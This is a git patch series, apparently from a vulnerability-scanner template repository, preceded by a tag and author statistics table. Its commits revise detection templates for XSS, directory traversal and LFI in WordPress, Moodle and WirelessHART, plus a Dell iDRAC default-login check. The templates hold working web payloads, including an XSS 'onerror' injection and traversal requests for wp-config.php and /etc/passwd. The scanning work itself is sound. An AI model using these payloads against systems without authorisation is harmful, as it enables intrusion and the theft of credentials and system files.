| | +| lucee | 5 | unstabl3 | 2 | | | | | | | +| laravel | 5 | udit_thakkur | 2 | | | | | | | +| ruijie | 5 | swissky | 2 | | | | | | | +| ssti | 5 | randomrobbie | 2 | | | | | | | +| phpmyadmin | 5 | ree4pwn | 2 | | | | | | | +| jetty | 5 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| java | 5 | afaq | 2 | | | | | | | +| confluence | 5 | bp0lr | 2 | | | | | | | +| iis | 5 | elsfa7110 | 2 | | | | | | | +| login | 5 | 0xelkomy | 2 | | | | | | | +| cve2009 | 4 | x1m_martijn | 2 | | | | | | | +| netgear | 4 | lu4nx | 2 | | | | | | | +| nodejs | 4 | foulenzer | 2 | | | | | | | +| jolokia | 4 | shifacyclewala | 2 | | | | | | | +| solarwinds | 4 | ehsahil | 2 | | | | | | | +| traversal | 4 | dheerajmadhukar | 2 | | | | | | | +| elastic | 4 | gevakun | 2 | | | | | | | +| router | 4 | vavkamil | 2 | | | | | | | +| vpn | 4 | emenalf | 2 | | | | | | | +| thinkphp | 4 | moritz nentwig | 2 | | | | | | | +| asp | 4 | arcc | 1 | | | | | | | +| django | 4 | hakluke | 1 | | | | | | | +| hongdian | 4 | rojanrijal | 1 | | | | | | | +| moodle | 4 | naglinagli | 1 | | | | | | | +| tomcat | 4 | shifacyclewla | 1 | | | | | | | +| artifactory | 4 | pdp | 1 | | | | | | | +| samsung | 4 | dawid czarnecki | 1 | | | | | | | +| magmi | 4 | deena | 1 | | | | | | | +| webserver | 4 | raesene | 1 | | | | | | | +| thinkcmf | 4 | bjhulst | 1 | | | | | | | +| docker | 4 | bing0o | 1 | | | | | | | +| fileupload | 4 | pudsec | 1 | | | | | | | +| ibm | 4 | remonsec | 1 | | | | | | | +| kafka | 3 | koti2 | 1 | | | | | | | +| ofbiz | 3 | yashgoti | 1 | | | | | | | +| openssh | 3 | thezakman | 1 | | | | | | | +| grafana | 3 | idealphase | 1 | | | | | | | +| log | 3 | streetofhackerr007 | 1 | | | | | | | +| springcloud | 3 | c3l3si4n | 1 | | | | | | | +| nosqli | 3 | akash.c | 1 | | | | | | | +| mongodb | 3 | aaron_costello | 1 | | | | | | | +| | | (@conspiracyproof) | | | | | | | | +| git | 3 | its0x08 | 1 | | | | | | | +| terramaster | 3 | becivells | 1 | | | | | | | +| fanruan | 3 | 0h1in9e | 1 | | | | | | | +| lfr | 3 | juicypotato1 | 1 | | | | | | | +| kubernetes | 3 | fabaff | 1 | | | | | | | +| oa | 3 | dogasantos | 1 | | | | | | | +| slack | 3 | th3.d1p4k | 1 | | | | | | | +| backups | 3 | alph4byt3 | 1 | | | | | | | +| ebs | 3 | tirtha_mandal | 1 | | | | | | | +| deserialization | 3 | j33n1k4 | 1 | | | | | | | +| microstrategy | 3 | regala_ | 1 | | | | | | | +| bypass | 3 | mohammedsaneem | 1 | | | | | | | +| dedecms | 3 | luci | 1 | | | | | | | +| crlf | 3 | ringo | 1 | | | | | | | +| vbulletin | 3 | luskabol | 1 | | | | | | | +| caucho | 3 | 0xrod | 1 | | | | | | | +| ssh | 3 | sushant kamble | 1 | | | | | | | +| | | (https://in.linkedin.com/in/sushantkamble) | | | | | | | | +| printer | 3 | manikanta a.k.a @secureitmania | 1 | | | | | | | +| nacos | 3 | taielab | 1 | | | | | | | +| windows | 3 | schniggie | 1 | | | | | | | +| amazon | 3 | kba@sogeti_esec | 1 | | | | | | | +| fpd | 3 | daviey | 1 | | | | | | | +| r-seenet | 3 | aceseven (digisec360) | 1 | | | | | | | +| resin | 3 | geraldino2 | 1 | | | | | | | +| zabbix | 2 | affix | 1 | | | | | | | +| sonarqube | 2 | _darrenmartyn | 1 | | | | | | | +| icewarp | 2 | bad5ect0r | 1 | | | | | | | +| oauth | 2 | rtcms | 1 | | | | | | | +| dos | 2 | berkdusunur | 1 | | | | | | | +| rockmongo | 2 | ipanda | 1 | | | | | | | +| seeyon | 2 | shelld3v | 1 | | | | | | | +| xxljob | 2 | 52971 | 1 | | | | | | | +| paloalto | 2 | furkansenan | 1 | | | | | | | +| odoo | 2 | johnjhacking | 1 | | | | | | | +| glassfish | 2 | @dwisiswant0 | 1 | | | | | | | +| strapi | 2 | manuelbua | 1 | | | | | | | +| wordfence | 2 | mubassirpatel | 1 | | | | | | | +| waf | 2 | undefl0w | 1 | | | | | | | +| saltstack | 2 | mah3sec_ | 1 | | | | | | | +| showdoc | 2 | cookiehanhoan | 1 | | | | | | | +| webcam | 2 | kabirsuda | 1 | | | | | | | +| ecology | 2 | iampritam | 1 | | | | | | | +| httpd | 2 | j3ssie/geraldino2 | 1 | | | | | | | +| proxy | 2 | b4uh0lz | 1 | | | | | | | +| sharepoint | 2 | toufik airane | 1 | | | | | | | +| nagios | 2 | notsoevilweasel | 1 | | | | | | | +| hp | 2 | knassar702 | 1 | | | | | | | +| rstudio | 2 | s1r1u5_ | 1 | | | | | | | +| prometheus | 2 | nytr0gen | 1 | | | | | | | +| nexus | 2 | sy3omda | 1 | | | | | | | +| huawei | 2 | ldionmarcil | 1 | | | | | | | +| telerik | 2 | absshax | 1 | | | | | | | +| spark | 2 | co0nan | 1 | | | | | | | +| mida | 2 | tim_koopmans | 1 | | | | | | | +| chamilo | 2 | noamrathaus | 1 | | | | | | | +| smtp | 2 | sshell | 1 | | | | | | | +| trixbox | 2 | kareemse1im | 1 | | | | | | | +| mail | 2 | patralos | 1 | | | | | | | +| zhiyuan | 2 | zandros0 | 1 | | | | | | | +| hjtcloud | 2 | ahmed sherif | 1 | | | | | | | +| rockethchat | 2 | _harleo | 1 | | | | | | | +| plesk | 2 | soyelmago | 1 | | | | | | | +| frp | 2 | ajaysenr | 1 | | | | | | | +| jboss | 2 | thevillagehacker | 1 | | | | | | | +| splunk | 2 | nkxxkn | 1 | | | | | | | +| vrealize | 2 | d0rkerdevil | 1 | | | | | | | +| microsoft | 2 | g4l1t0 and @convisoappsec | 1 | | | | | | | +| kibana | 2 | bolli95 | 1 | | | | | | | +| leak | 2 | defr0ggy | 1 | | | | | | | +| hpe | 2 | shreyapohekar | 1 | | | | | | | +| keycloak | 2 | smaranchand | 1 | | | | | | | +| service | 2 | sicksec | 1 | | | | | | | +| bitrix | 2 | 0xtavian | 1 | | | | | | | +| jellyfin | 2 | dudez | 1 | | | | | | | +| flir | 2 | fopina | 1 | | | | | | | +| exposures | 2 | sullo | 1 | | | | | | | +| cache | 2 | mhdsamx | 1 | | | | | | | +| voipmonitor | 2 | johnk3r | 1 | | | | | | | +| bigip | 2 | micha3lb3n | 1 | | | | | | | +| emerge | 2 | wabafet | 1 | | | | | | | +| shellshock | 2 | alex | 1 | | | | | | | +| injection | 2 | omarkurt | 1 | | | | | | | +| yapi | 2 | sid ahmed malaoui @ realistic | 1 | | | | | | | +| | | security | | | | | | | | +| ucmdb | 2 | ooooooo_q | 1 | | | | | | | +| intrusive | 2 | chron0x | 1 | | | | | | | +| fortios | 2 | gboddin | 1 | | | | | | | +| sonicwall | 2 | 0ut0fb4nd | 1 | | | | | | | +| pega | 2 | qlkwej | 1 | | | | | | | +| globalprotect | 2 | ratnadip gajbhiye | 1 | | | | | | | +| activemq | 2 | willd96 | 1 | | | | | | | +| cve2008 | 2 | apt-mirror | 1 | | | | | | | +| openam | 2 | _generic_human_ | 1 | | | | | | | +| coldfusion | 2 | ivo palazzolo (@palaziv) | 1 | | | | | | | +| openfire | 2 | divya_mudgal | 1 | | | | | | | +| hashicorp | 2 | kurohost | 1 | | | | | | | +| smb | 2 | _c0wb0y_ | 1 | | | | | | | +| maian | 2 | w4cky_ | 1 | | | | | | | +| couchdb | 2 | r3naissance | 1 | | | | | | | +| kentico | 2 | ilovebinbash | 1 | | | | | | | +| natshell | 2 | jeya seelan | 1 | | | | | | | +| nextjs | 2 | whynotke | 1 | | | | | | | +| idrac | 2 | akshansh | 1 | | | | | | | +| totaljs | 1 | exploitation | 1 | | | | | | | +| soar | 1 | ohlinge | 1 | | | | | | | +| traefik | 1 | yashanand155 | 1 | | | | | | | +| b2evolution | 1 | gal nagli | 1 | | | | | | | +| wavemaker | 1 | zhenwarx | 1 | | | | | | | +| enumeration | 1 | fmunozs | 1 | | | | | | | +| subrion | 1 | vsh00t | 1 | | | | | | | +| ems | 1 | @github.com/defr0ggy | 1 | | | | | | | +| comodo | 1 | elmahdi | 1 | | | | | | | +| yii | 1 | rodnt | 1 | | | | | | | +| htmli | 1 | yavolo | 1 | | | | | | | +| darkstat | 1 | abison_binoy | 1 | | | | | | | +| phalcon | 1 | alifathi-h1 | 1 | | | | | | | +| axis | 1 | hanlaomo | 1 | | | | | | | +| netsweeper | 1 | blckraven | 1 | | | | | | | +| jnoj | 1 | kishore krishna (sillydaddy) | 1 | | | | | | | +| skywalking | 1 | alperenkesk | 1 | | | | | | | +| targa | 1 | flag007 | 1 | | | | | | | +| octobercms | 1 | sickwell | 1 | | | | | | | +| tpshop | 1 | andirrahmani1 | 1 | | | | | | | +| azure | 1 | vzamanillo | 1 | | | | | | | +| heroku | 1 | streetofhackerr007 (rohit | 1 | | | | | | | +| | | soni) | | | | | | | | +| discord | 1 | | | | | | | | | +| nps | 1 | | | | | | | | | +| biometrics | 1 | | | | | | | | | +| bolt | 1 | | | | | | | | | +| woocomernce | 1 | | | | | | | | | +| ueditor | 1 | | | | | | | | | +| mcafee | 1 | | | | | | | | | +| wamp | 1 | | | | | | | | | +| bitly | 1 | | | | | | | | | +| cloudflare | 1 | | | | | | | | | +| optiLink | 1 | | | | | | | | | +| turbocrm | 1 | | | | | | | | | +| k8 | 1 | | | | | | | | | +| primetek | 1 | | | | | | | | | +| wuzhicms | 1 | | | | | | | | | +| eyou | 1 | | | | | | | | | +| swagger | 1 | | | | | | | | | +| firebase | 1 | | | | | | | | | +| zzzcms | 1 | | | | | | | | | +| dlogin | 1 | | | | | | | | | +| sidekiq | 1 | | | | | | | | | +| fortigate | 1 | | | | | | | | | +| nexusdb | 1 | | | | | | | | | +| concrete | 1 | | | | | | | | | +| db | 1 | | | | | | | | | +| setup | 1 | | | | | | | | | +| domxss | 1 | | | | | | | | | +| oscommerce | 1 | | | | | | | | | +| anchorcms | 1 | | | | | | | | | +| jenkin | 1 | | | | | | | | | +| cocoon | 1 | | | | | | | | | +| triconsole | 1 | | | | | | | | | +| tileserver | 1 | | | | | | | | | +| circontrol | 1 | | | | | | | | | +| openerp | 1 | | | | | | | | | +| selea | 1 | | | | | | | | | +| acme | 1 | | | | | | | | | +| centos | 1 | | | | | | | | | +| zimbra | 1 | | | | | | | | | +| ssltls | 1 | | | | | | | | | +| sentry | 1 | | | | | | | | | +| gloo | 1 | | | | | | | | | +| pyramid | 1 | | | | | | | | | +| vscode | 1 | | | | | | | | | +| lanproxy | 1 | | | | | | | | | +| mediumish | 1 | | | | | | | | | +| zarafa | 1 | | | | | | | | | +| flink | 1 | | | | | | | | | +| mirai | 1 | | | | | | | | | +| xdcms | 1 | | | | | | | | | +| smartsense | 1 | | | | | | | | | +| opensmtpd | 1 | | | | | | | | | +| itop | 1 | | | | | | | | | +| majordomo2 | 1 | | | | | | | | | +| zmanda | 1 | | | | | | | | | +| panabit | 1 | | | | | | | | | +| grav | 1 | | | | | | | | | +| redwood | 1 | | | | | | | | | +| acexy | 1 | | | | | | | | | +| kong | 1 | | | | | | | | | +| sitecore | 1 | | | | | | | | | +| salesforce | 1 | | | | | | | | | +| ulterius | 1 | | | | | | | | | +| alibaba | 1 | | | | | | | | | +| st | 1 | | | | | | | | | +| zeroshell | 1 | | | | | | | | | +| expn | 1 | | | | | | | | | +| xml | 1 | | | | | | | | | +| embedthis | 1 | | | | | | | | | +| avalanche | 1 | | | | | | | | | +| realteo | 1 | | | | | | | | | +| zend | 1 | | | | | | | | | +| opm | 1 | | | | | | | | | +| panos | 1 | | | | | | | | | +| nuxeo | 1 | | | | | | | | | +| linkerd | 1 | | | | | | | | | +| jitsi | 1 | | | | | | | | | +| jsp | 1 | | | | | | | | | +| hasura | 1 | | | | | | | | | +| monitorix | 1 | | | | | | | | | +| episerver | 1 | | | | | | | | | +| spf | 1 | | | | | | | | | +| chinaunicom | 1 | | | | | | | | | +| jsf | 1 | | | | | | | | | +| shopware | 1 | | | | | | | | | +| erp-nc | 1 | | | | | | | | | +| upnp | 1 | | | | | | | | | +| spidercontrol | 1 | | | | | | | | | +| aspnuke | 1 | | | | | | | | | +| klog | 1 | | | | | | | | | +| apiman | 1 | | | | | | | | | +| nordex | 1 | | | | | | | | | +| redhat | 1 | | | | | | | | | +| email | 1 | | | | | | | | | +| keenetic | 1 | | | | | | | | | +| proftpd | 1 | | | | | | | | | +| node | 1 | | | | | | | | | +| maccmsv10 | 1 | | | | | | | | | +| clave | 1 | | | | | | | | | +| cloudinary | 1 | | | | | | | | | +| dvwa | 1 | | | | | | | | | +| moinmoin | 1 | | | | | | | | | +| favicon | 1 | | | | | | | | | +| upload | 1 | | | | | | | | | +| cors | 1 | | | | | | | | | +| empirecms | 1 | | | | | | | | | +| feifeicms | 1 | | | | | | | | | +| node-red-dashboard | 1 | | | | | | | | | +| appweb | 1 | | | | | | | | | +| xiuno | 1 | | | | | | | | | +| socomec | 1 | | | | | | | | | +| stem | 1 | | | | | | | | | +| spring | 1 | | | | | | | | | +| thinkadmin | 1 | | | | | | | | | +| clusterengine | 1 | | | | | | | | | +| doh | 1 | | | | | | | | | +| rmi | 1 | | | | | | | | | +| pulsesecure | 1 | | | | | | | | | +| alertmanager | 1 | | | | | | | | | +| plone | 1 | | | | | | | | | +| fastcgi | 1 | | | | | | | | | +| adminer | 1 | | | | | | | | | +| kafdrop | 1 | | | | | | | | | +| ec2 | 1 | | | | | | | | | +| dom | 1 | | | | | | | | | +| hortonworks | 1 | | | | | | | | | +| cse | 1 | | | | | | | | | +| discourse | 1 | | | | | | | | | +| ruby | 1 | | | | | | | | | +| emby | 1 | | | | | | | | | +| codemeter | 1 | | | | | | | | | +| faraday | 1 | | | | | | | | | +| glances | 1 | | | | | | | | | +| ioncube | 1 | | | | | | | | | +| parentlink | 1 | | | | | | | | | +| aura | 1 | | | | | | | | | +| opencast | 1 | | | | | | | | | +| lansweeper | 1 | | | | | | | | | +| dvr | 1 | | | | | | | | | +| pgadmin | 1 | | | | | | | | | +| fiori | 1 | | | | | | | | | +| powercreator | 1 | | | | | | | | | +| wildfly | 1 | | | | | | | | | +| mailchimp | 1 | | | | | | | | | +| viewlinc | 1 | | | | | | | | | +| 74cms | 1 | | | | | | | | | +| ganglia | 1 | | | | | | | | | +| servicedesk | 1 | | | | | | | | | +| goahead | 1 | | | | | | | | | +| krweb | 1 | | | | | | | | | +| vsftpd | 1 | | | | | | | | | +| ricoh | 1 | | | | | | | | | +| shopxo | 1 | | | | | | | | | +| tensorboard | 1 | | | | | | | | | +| cobub | 1 | | | | | | | | | +| yachtcontrol | 1 | | | | | | | | | +| csrf | 1 | | | | | | | | | +| jquery | 1 | | | | | | | | | +| webui | 1 | | | | | | | | | +| kyan | 1 | | | | | | | | | +| cve2005 | 1 | | | | | | | | | +| zte | 1 | | | | | | | | | +| springframework | 1 | | | | | | | | | +| wmt | 1 | | | | | | | | | +| fortinet | 1 | | | | | | | | | +| javascript | 1 | | | | | | | | | +| mautic | 1 | | | | | | | | | +| duomicms | 1 | | | | | | | | | +| etouch | 1 | | | | | | | | | +| fedora | 1 | | | | | | | | | +| webmin | 1 | | | | | | | | | +| jmx | 1 | | | | | | | | | +| zenario | 1 | | | | | | | | | +| rujjie | 1 | | | | | | | | | +| geddy | 1 | | | | | | | | | +| mongo | 1 | | | | | | | | | +| wiki | 1 | | | | | | | | | +| fortigates | 1 | | | | | | | | | +| dompdf | 1 | | | | | | | | | +| igs | 1 | | | | | | | | | +| xunchi | 1 | | | | | | | | | +| diris | 1 | | | | | | | | | +| fortiweb | 1 | | | | | | | | | +| plc | 1 | | | | | | | | | +| zcms | 1 | | | | | | | | | +| npm | 1 | | | | | | | | | +| nedi | 1 | | | | | | | | | +| cve2010 | 1 | | | | | | | | | +| revision | 1 | | | | | | | | | +| javamelody | 1 | | | | | | | | | +| jenzabar | 1 | | | | | | | | | +| saltapi | 1 | | | | | | | | | +| dotnet | 1 | | | | | | | | | +| gridx | 1 | | | | | | | | | +| beanshell | 1 | | | | | | | | | +| lotuscms | 1 | | | | | | | | | +| haproxy | 1 | | | | | | | | | +| kubeflow | 1 | | | | | | | | | +| pippoint | 1 | | | | | | | | | +| trilithic | 1 | | | | | | | | | +| gateone | 1 | | | | | | | | | +| robomongo | 1 | | | | | | | | | +| akamai | 1 | | | | | | | | | +| postmessage | 1 | | | | | | | | | +| plugin | 1 | | | | | | | | | +| mongoshake | 1 | | | | | | | | | +| wooyun | 1 | | | | | | | | | +| lancom | 1 | | | | | | | | | +| mantisbt | 1 | | | | | | | | | +| circontrorl | 1 | | | | | | | | | +| octoprint | 1 | | | | | | | | | +| moin | 1 | | | | | | | | | +| sco | 1 | | | | | | | | | +| ntopng | 1 | | | | | | | | | +| netis | 1 | | | | | | | | | +| postgres | 1 | | | | | | | | | +| scs | 1 | | | | | | | | | +| blue-ocean | 1 | | | | | | | | | +| zm | 1 | | | | | | | | | +| mara | 1 | | | | | | | | | +| rfi | 1 | | | | | | | | | +| huijietong | 1 | | | | | | | | | +| blind | 1 | | | | | | | | | +| 2014 | 1 | | | | | | | | | +| ssl | 1 | | | | | | | | | +| ns | 1 | | | | | | | | | +| clockwatch | 1 | | | | | | | | | +| jeewms | 1 | | | | | | | | | +| tensorflow | 1 | | | | | | | | | +| tapestry | 1 | | | | | | | | | +| enum | 1 | | | | | | | | | +| drone | 1 | | | | | | | | | +| codeigniter | 1 | | | | | | | | | +| rsyncd | 1 | | | | | | | | | +| wso2 | 1 | | | | | | | | | +| payara | 1 | | | | | | | | | +| labtech | 1 | | | | | | | | | +| nette | 1 | | | | | | | | | +| gitlist | 1 | | | | | | | | | +| rubedo | 1 | | | | | | | | | +| webadmin | 1 | | | | | | | | | +| bullwark | 1 | | | | | | | | | +| ilo4 | 1 | | | | | | | | | +| geutebruck | 1 | | | | | | | | | +| ecom | 1 | | | | | | | | | +| tenda | 1 | | | | | | | | | +| rdp | 1 | | | | | | | | | +| jfrog | 1 | | | | | | | | | +| extractor | 1 | | | | | | | | | +| bookstack | 1 | | | | | | | | | +| sprintful | 1 | | | | | | | | | +| tamronos | 1 | | | | | | | | | +| blackboard | 1 | | | | | | | | | +| esmtp | 1 | | | | | | | | | +| sarg | 1 | | | | | | | | | +| bash | 1 | | | | | | | | | +| liferay | 1 | | | | | | | | | +| horde | 1 | | | | | | | | | +| cgi | 1 | | | | | | | | | +| zookeeper | 1 | | | | | | | | | +| harbor | 1 | | | | | | | | | +| pacsone | 1 | | | | | | | | | +| crm | 1 | | | | | | | | | +| javafaces | 1 | | | | | | | | | +| szhe | 1 | | | | | | | | | +| tika | 1 | | | | | | | | | +| razor | 1 | | | | | | | | | +| landray | 1 | | | | | | | | | +| kerbynet | 1 | | | | | | | | | +| netrc | 1 | | | | | | | | | +| druid | 1 | | | | | | | | | +| csod | 1 | | | | | | | | | +| mdb | 1 | | | | | | | | | +| vsphere | 1 | | | | | | | | | +| wazuh | 1 | | | | | | | | | +| nsasg | 1 | | | | | | | | | +| opentsdb | 1 | | | | | | | | | +| mpsec | 1 | | | | | | | | | +| spectracom | 1 | | | | | | | | | +| landrayoa | 1 | | | | | | | | | +| openrestry | 1 | | | | | | | | | +| linkedin | 1 | | | | | | | | | +| alerta | 1 | | | | | | | | | +| floc | 1 | | | | | | | | | +| weiphp | 1 | | | | | | | | | +| status | 1 | | | | | | | | | +| sqlite | 1 | | | | | | | | | +| uwsgi | 1 | | | | | | | | | +| synnefo | 1 | | | | | | | | | +| nuuo | 1 | | | | | | | | | +| exchange | 1 | | | | | | | | | +| opensns | 1 | | | | | | | | | +| openstack | 1 | | | | | | | | | +| finereport | 1 | | | | | | | | | +| flash | 1 | | | | | | | | | +| seacms | 1 | | | | | | | | | +| redis | 1 | | | | | | | | | +| backdoor | 1 | | | | | | | | | +| servicenow | 1 | | | | | | | | | +| plastic | 1 | | | | | | | | | +| viewpoint | 1 | | | | | | | | | +| arl | 1 | | | | | | | | | +| memcached | 1 | | | | | | | | | +| livezilla | 1 | | | | | | | | | +| wp-theme | 1 | | | | | | | | | +| phpinfo | 1 | | | | | | | | | +| rmc | 1 | | | | | | | | | +| dotnetnuke | 1 | | | | | | | | | +| avtech | 1 | | | | | | | | | +| emc | 1 | | | | | | | | | +| gogs | 1 | | | | | | | | | +| timeclock | 1 | | | | | | | | | +| calendarix | 1 | | | | | | | | | +| fastapi | 1 | | | | | | | | | +| xff | 1 | | | | | | | | | +| interlib | 1 | | | | | | | | | +| metinfo | 1 | | | | | | | | | +| symfony | 1 | | | | | | | | | +| rabbitmq | 1 | | | | | | | | | +| webmodule-ee | 1 | | | | | | | | | +| nc2 | 1 | | | | | | | | | +| checkpoint | 1 | | | | | | | | | +| grails | 1 | | | | | | | | | +| tongda | 1 | | | | | | | | | +| phpunit | 1 | | | | | | | | | +| webftp | 1 | | | | | | | | | +| starttls | 1 | | | | | | | | | +| netdata | 1 | | | | | | | | | +| varnish | 1 | | | | | | | | | +| ambari | 1 | | | | | | | | | +| k8s | 1 | | | | | | | | | +| linksys | 1 | | | | | | | | | +| fortilogger | 1 | | | | | | | | | +| cve2007 | 1 | | | | | | | | | +| fuelcms | 1 | | | | | | | | | +| nomad | 1 | | | | | | | | | +| svn | 1 | | | | | | | | | +| portainer | 1 | | | | | | | | | +| timesheet | 1 | | | | | | | | | +| visionhub | 1 | | | | | | | | | +| hadoop | 1 | | | | | | | | | +| idemia | 1 | | | | | | | | | +| myucms | 1 | | | | | | | | | +| mysql | 1 | | | | | | | | | +| bruteforce | 1 | | | | | | | | | +| rhymix | 1 | | | | | | | | | +| svnserve | 1 | | | | | | | | | +| wifisky | 1 | | | | | | | | | +| mobileiron | 1 | | | | | | | | | From 414883f719c9ac4d5a50900a11a6b5081cd0506e Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 19 Jul 2021 23:55:15 +0530 Subject: [PATCH 0904/4083] Update CVE-2020-12054.yaml --- cves/2020/CVE-2020-12054.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/cves/2020/CVE-2020-12054.yaml b/cves/2020/CVE-2020-12054.yaml index 2ab2fab4c9..60bcb223fb 100644 --- a/cves/2020/CVE-2020-12054.yaml +++ b/cves/2020/CVE-2020-12054.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/?s=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + - '{{BaseURL}}/?s=%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3B%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" - "catch-breadcrumb" part: body condition: and @@ -29,4 +29,4 @@ requests: - type: status status: - - 200 + - 200 \ No newline at end of file From 13d26d8c6d4f10431357de4a7c330cc511e416f3 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 20 Jul 2021 00:10:30 +0530 Subject: [PATCH 0905/4083] moving files around --- .../2021/CVE-2021-26812.yaml | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) rename vulnerabilities/moodle/moodle-jitsi-plugin-xss.yaml => cves/2021/CVE-2021-26812.yaml (72%) diff --git a/vulnerabilities/moodle/moodle-jitsi-plugin-xss.yaml b/cves/2021/CVE-2021-26812.yaml similarity index 72% rename from vulnerabilities/moodle/moodle-jitsi-plugin-xss.yaml rename to cves/2021/CVE-2021-26812.yaml index 00843f0d3f..23274c8a84 100644 --- a/vulnerabilities/moodle/moodle-jitsi-plugin-xss.yaml +++ b/cves/2021/CVE-2021-26812.yaml @@ -1,12 +1,14 @@ -id: moodle-jitsi-plugin-xss +id: CVE-2021-26812 info: name: Moodle jitsi plugin XSS author: aceseven (digisec360) description: Cross-site Scripting in moodle jitsi plugin severity: medium - tags: moodle,jitsi,xss,revision - reference: https://github.com/udima-university/moodle-mod_jitsi/issues/67 + tags: cve,cve2021,moodle,jitsi,xss + reference: | + - https://github.com/udima-university/moodle-mod_jitsi/issues/67 + - https://nvd.nist.gov/vuln/detail/CVE-2021-26812 requests: - method: GET @@ -27,4 +29,4 @@ requests: - type: word part: header words: - - "text/html" + - "MoodleSession" \ No newline at end of file From 390e9191ec7bd30eb2b259ab75af9e421972bfbb Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 20 Jul 2021 00:11:27 +0530 Subject: [PATCH 0906/4083] minor update --- .nuclei-ignore | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/.nuclei-ignore b/.nuclei-ignore index 4c03aa907a..fe634beab1 100644 --- a/.nuclei-ignore +++ b/.nuclei-ignore @@ -8,10 +8,9 @@ # unless asked for by the user. tags: + - "fuzz" - "dos" - "misc" - - "fuzz" - - "revision" # files is a list of files to ignore template execution # unless asked for by the user. \ No newline at end of file From 9d19d5fb5b5bb5a9b942af8944a378cad46b4e5b Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 20 Jul 2021 00:12:01 +0530 Subject: [PATCH 0907/4083] description update --- cves/2021/CVE-2021-26812.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-26812.yaml b/cves/2021/CVE-2021-26812.yaml index 23274c8a84..c6316beaa3 100644 --- a/cves/2021/CVE-2021-26812.yaml +++ b/cves/2021/CVE-2021-26812.yaml @@ -3,7 +3,7 @@ id: CVE-2021-26812 info: name: Moodle jitsi plugin XSS author: aceseven (digisec360) - description: Cross-site Scripting in moodle jitsi plugin + description: Cross Site Scripting (XSS) in the Jitsi Meet 2.7 through 2.8.3 plugin for Moodle via the "sessionpriv.php" module. This allows attackers to craft a malicious URL, which when clicked on by users, can inject javascript code to be run by the application. severity: medium tags: cve,cve2021,moodle,jitsi,xss reference: | From aa2c8d210bd483c5d13fb119a2d1d20826b9bf33 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Tue, 20 Jul 2021 00:15:32 +0530 Subject: [PATCH 0908/4083] Update CVE-2018-16059.yaml --- cves/2018/CVE-2018-16059.yaml | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/cves/2018/CVE-2018-16059.yaml b/cves/2018/CVE-2018-16059.yaml index 030e0e9f95..d907c47ceb 100644 --- a/cves/2018/CVE-2018-16059.yaml +++ b/cves/2018/CVE-2018-16059.yaml @@ -3,8 +3,10 @@ id: CVE-2018-16059 info: name: WirelessHART Fieldgate SWG70 3.0 - Directory Traversal author: daffainfo - severity: high - reference: https://www.exploit-db.com/exploits/45342 + severity: medium + reference: | + - https://nvd.nist.gov/vuln/detail/CVE-2018-16059 + - https://www.exploit-db.com/exploits/45342 tags: cve,cve2018,iot,lfi requests: @@ -15,7 +17,6 @@ requests: matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" From 7d94c55a789a47bdd55b740b53e7af050456f54e Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 20 Jul 2021 00:30:02 +0530 Subject: [PATCH 0909/4083] minor improvements --- default-logins/dell/dell-idrac9-default-login.yaml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/default-logins/dell/dell-idrac9-default-login.yaml b/default-logins/dell/dell-idrac9-default-login.yaml index 10fe93be8f..78d78f3130 100644 --- a/default-logins/dell/dell-idrac9-default-login.yaml +++ b/default-logins/dell/dell-idrac9-default-login.yaml @@ -25,6 +25,9 @@ requests: - type: status status: - 201 + - 200 + condition: or + - type: word part: body words: From 4dbf36813ddd09c0e2ebdfc9689d5bfdbdf59012 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 20 Jul 2021 00:43:39 +0530 Subject: [PATCH 0910/4083] removing duplicate template --- cves/2018/CVE-2018-7422.yaml | 12 +++++++----- .../wordpress/wp-site-editor-lfi.yaml | 19 ------------------- 2 files changed, 7 insertions(+), 24 deletions(-) delete mode 100644 vulnerabilities/wordpress/wp-site-editor-lfi.yaml diff --git a/cves/2018/CVE-2018-7422.yaml b/cves/2018/CVE-2018-7422.yaml index 0662aac51c..6aa32d6c87 100644 --- a/cves/2018/CVE-2018-7422.yaml +++ b/cves/2018/CVE-2018-7422.yaml @@ -2,7 +2,7 @@ id: CVE-2018-7422 info: name: WordPress Site Editor Plugin LFI - author: LuskaBol + author: LuskaBol,0x240x23elu severity: high tags: cve,cve2018,wordpress,wp-plugin,lfi description: A Local File Inclusion vulnerability in the Site Editor plugin through 1.1.1 for WordPress allows remote attackers to retrieve arbitrary files via the ajax_path parameter to editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php. @@ -12,8 +12,9 @@ requests: - method: GET path: - '{{BaseURL}}/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php' + - "{{BaseURL}}/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd" - matchers-condition: and + matchers-condition: or matchers: - type: word words: @@ -22,6 +23,7 @@ requests: part: body condition: and - - type: status - status: - - 200 + - type: regex + regex: + - "root:[x*]:0:0:" + part: body \ No newline at end of file diff --git a/vulnerabilities/wordpress/wp-site-editor-lfi.yaml b/vulnerabilities/wordpress/wp-site-editor-lfi.yaml deleted file mode 100644 index d71b084130..0000000000 --- a/vulnerabilities/wordpress/wp-site-editor-lfi.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: wp-site-editor-lfi - -info: - name: WordPress Plugin Site Editor 1.1.1 - Local File Inclusion - author: 0x240x23elu - severity: high - reference: https://www.exploit-db.com/exploits/44340 - tags: 